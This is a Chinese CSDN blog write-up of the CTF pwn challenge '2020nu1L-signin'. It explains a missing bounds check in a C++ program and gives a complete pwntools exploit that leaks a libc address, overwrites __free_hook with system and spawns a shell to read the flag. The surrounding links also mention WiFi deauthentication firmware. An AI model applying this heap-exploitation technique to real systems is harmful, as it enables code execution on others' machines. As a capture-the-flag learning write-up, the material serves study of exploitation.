[BMZCTF-pwn] 39-2020nu1L-signin

最新推荐文章于 2023-10-19 11:17:43 发布
最新推荐文章于 2023-10-19 11:17:43 发布
阅读量114 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123002447
版权

看不懂c++写的东西,经过几回测试大概是这个功能:

  1. 在0x2032a0和0x2032c0保存两个结构,结构里存开始指针,当前指针和最大指针。
  2. 建块是从8开始如果块不够大就申请2倍大小并把前一个释放掉,原来的东西复制到新块里。
  3. show时会把当前指针前8字节作为数字显示
  4. free里当前指针减8。这里没有越界处理。

解题思路:

  1. 先利用指针1一直增加到释放掉0x810块到unsort(依次使用的块分别是20,20,30,50,90,110,210,410,810,1010)
  2. free向前移指针一直到unsort的fd,show得到libc地址
  3. 再向前free到第2个0x20块处,add写入free_hook-8
  4. 指针2建块依次写入/bin/sh,system(第2次增加时会将/bin/sh复制到free_hook-8,system复制到free_hook)
  5. 再次指针2增加时调用free得到shell

完整exp:

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 1
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('106.75.101.133', 10052) 
        libc_elf = ELF('./libc.so')
        one = [0x4f365,0x4f3c2,0x10a45c]
        libc_start_main_ret = 0x21b97

'''
ptr:0x2032a0,0x2032c0
start,end,block_end
'''

menu = b">>"
def add(idx, num):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Index:", str(idx).encode())
    p.sendlineafter(b"Number:", str(num).encode())

def add2(idx, num):
    p.sendlineafter(menu, b'1')
    p.sendline(str(idx).encode())
    p.sendline(str(num).encode())

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'Index:', str(idx).encode())

def free2(idx):
    p.sendlineafter(menu, b'2')
    p.sendline(str(idx).encode())

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'Index:', str(idx).encode())

def pwn():
    [add(1,i) for i in range(257)]
    [free(1) for i in range(0x202)]
    show(1)
    libc_base = int(p.recvline()) - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[0] 
    print('libc:', hex(libc_base))

    [free(1) for i in range(0x10d)]
    add(1, libc_elf.sym['__free_hook']-8)
    
    #context.log_level = 'debug'

    add(2, u64(b'/bin/sh\x00'))
    add(2, libc_elf.sym['system'])
    #add(2, 3)
    p.send(b'1')
    
    #gdb.attach(p)
    #pause()

    p.sendline(b'cat /flag')
    p.interactive()

connect()
pwn()

石氏是时试
关注
专栏目录
BugkuCTF-Reverse题signin
am_03的博客
08-27 793
知识点 reverse() 功能:反转数组里的元素的顺序 语法:arrayobject.reverse.() 这类方法会改变原来的数组,不可逆转 tostring() 功能:将各类进制的数字转化为字符串 语法:number.toString(radix)(radix代表进制数) 字符串的管理地方是string.xml java在引用函数时要倒着引用 解题流程 随便输入几个数据,点击LOGIN,flag要么从源码里得到,要么输入正确的值跳出flag 1.用jeb打开,找到MainActivity,右键解析成
2021-6-8:参加CTF校赛的WP
Hammers_12的博客
06-08 1721
一、Sign_in 简单web题 正常思路先看一下源码 按F12 后看到答案 二、签到 简单Misc题 打开以后 看到有问题和文件夹可以选择 直接选到底 直接得到flag 三、简单题 Reverse简单题 直接打开附件 给出附件为getflag.c文件, 可以看出,flag即为FJZ{1jf11dm4hpns9k0wk2s}的解密 char *caesar_f(char * passwd) { int i,j...
ctf Sign_in.apk 解题笔记
最新发布
u010490930的博客
10-19 226
ctf解题笔记
BUUCTF-----signin
qq_64558075的博客
12-09 584
1.拿到文件,查壳 收集信息,无壳,64位程序 2.拖入ida中 程序调用了 __gmpz_init_set_str 函数,这是一个 GNU 高精度算法库,在以前的RSA加密中见过很多次,加上65537这个比较敏感的数据,就基本确定了这是道RSA加密 可以从程序的本身得知 公钥N=103461035900816914121390101299049044413950405173712170434161686539878160984549 E=65537 加密后的密文为:ad939ff5.
nepctf signin
weixin_63290123的博客
07-20 225
nepctf2022 signin
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf学习记录5.10
m0_73710531的博客
05-17 475
GET Your Flag
[SUCTF 2019] SignIn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-02 4247
[SUCTF 2019] SignIn 如果对本文存在有疑问或需要工具可以在下方给我留言! 这题比较简单 题目下载地址:https://www.lanzous.com/iawzl2f 程序没有加壳,直接IDA载入 直接分析main函数,我们可以看到程序的逻辑很清晰。 使用GDB调试得知sub_96A函数是把用户输入的字符串转换为16进制存入v9中。 继续往下看,程序调用了 __gmpz_...
BugkuCTF-Android-signin
Jaychouzzk
11-15 1246
0x01   start 先将这道题目下载下来,并且放入Android killer中   0x02  NEXT 因为在Android killer 中无法看到java源码 所以使用Androidtool Box工具 先将Sign_in.apk 改为Sign_in.zip 并且将内容解压出来,可以得到这些文件 然后使用Androidtool Box    然后...
CTFRSA加解密
weixin_52369224的博客
10-06 1712
最近做题遇到好几次RSA解密,最近密码学课也学到了 RSA密码算法,写一篇文章促进对RSA的理解。 一:RSA的基本原理的理解: 1.学习RSA加密得知道欧拉函数,想理解欧拉函数又得弄明白同余类与剩余系的知识,这些是基础。 2.RSA的密钥生成原理: 第一步:选择两个较大素数P,Q. 第二步:计算n=pq,z=(p-1)(q-1)。 第三步:随机选取e(其中e<n),e与z没有公因数(e,z互为质数) 第四步:选取d使得ed-1能够被z完全整除。edmod z=1 第五部:公钥是(n.
CTF合集
王嘟嘟的博客
10-25 3327
0x00 前言 总计记录我在CTF的道路 0x01 练习 1.Bugku 1.1 杂项 Bugku-闪的好快 60 1.2 web Bugku-we5 60 Bugku-头等舱 Bugku-网站被黑 Bugku-管理员系统 Bugku-web4 0x02 资源 在线编码 字母url编码 ...
Bugku——signin
王嘟嘟的博客
11-14 3602
0x00 前言 今天突然来一看,发现bugku更新了,正好来看一看。 本来以为只是一道前道题的。结果里面的道道还是有一点多的。我们接下来就分享一下思路,以及做法。 0x01 start 其实拿到这种都是要先安装看一下的。我能说我有一点懒么。 你们自己看一看就好。 我们使用AndroidKiller反编译。 然后回编译测试一下。 一道签到题,连回编译都不行了??? 试一下直接看java源码 ...
Bugku—安卓—signin(这是签到题)
渗透、攻防、CTF、编程
07-07 2581
君远至此,辛苦至甚。 窃谓欲状,亦合依例,并赐此题。 (来吧,签个到热个身。) 来源:第七届山东省大学生网络安全技能大赛 安卓文件,signin.apk 解析:签到题不简单,如果不理解安卓开发的一些配置文件,会有些难度。 0x00、模拟器安装 0x01、逆向安装包分析 安卓逆向工具可以选择jeb2或者APKTool,在此用jeb2做演示了 MainAcitivity主程序分析代码 关键性代码 paramString.equals(new String(Base64...
BUUCTF:[羊城杯 2020]signin
末初的CSDN博客
04-23 1811
https://buuoj.cn/challenges#[%E7%BE%8A%E5%9F%8E%E6%9D%AF%202020]signin signin.txt BCEHACEIBDEIBDEHBDEHADEIACEGACFIBDFHACEGBCEHBCFIBDEGBDEGADFGBDEHBDEGBDFHBCEGACFIBCFGADEIADEIADFH Toy Cipher: https://eprint.iacr.org/2020/301.pdf 先将密文四个一组对照第二张表转换,简单Pytho
login1(SKCTF)(bugku)
hhh
09-29 2115
  这周学长出了两道二次注入的题(再也不能直接用sqlmap水过去了……)第一道现在还没写出来QAQ,但是从第二道多少学习了一下手工注入的一些操作。   先是看了几篇讲解约束注入的博客,这个博主小姐姐超厉害,在这里就说一下自己的理解: 约束SQL注入的原理就是利用的约束条件,比如最长只能有15个字符的话,如果你输入的是abcdefghijklmnop(16位),那么保存在数据库里的就是abcd...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值